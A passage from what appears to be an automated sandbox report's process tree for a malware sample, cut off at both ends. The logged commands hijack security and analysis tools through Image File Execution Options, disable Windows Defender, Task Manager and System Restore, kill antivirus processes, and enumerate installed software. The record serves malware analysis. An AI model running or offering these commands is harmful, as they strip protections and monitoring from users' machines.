  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:392
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:588
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:512
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:800
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:324
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2008
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:1892
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1544
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1140
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1496
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:2064
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2100
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:2108
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2132
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:2156
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2188
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2204
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:2228
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2248
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2280
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2304
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2328
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2372
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2624
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:2768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:2816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:2856
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:2880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:2896
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:2928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:2948
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:2972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2984
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:3040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1252
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:2076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:2128
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2184
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:2216
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2256
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:2292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:2316
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1932
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2244
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:1504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:588
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:2084
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:2008
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:2180
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    PID:2204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:2220
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:2396
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:2108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:2468
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2424
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:2448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:2168
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    PID:2464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:1544
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:2472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:2332
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:2272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:2632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    PID:2676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:884
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:2636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:2032
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:2732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2688
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:2800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:2788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    PID:2816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:2884
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2524
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1372
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3000
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2096
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2060
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2212
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1872
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2352
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1836
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2600
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2372
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2404
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2576
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1932
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3068
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1704
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2084
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2204
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2264
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2552
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    PID:1388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:3024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:2256
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:2384
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2276
- - C:\Windows\system32\reg.exe
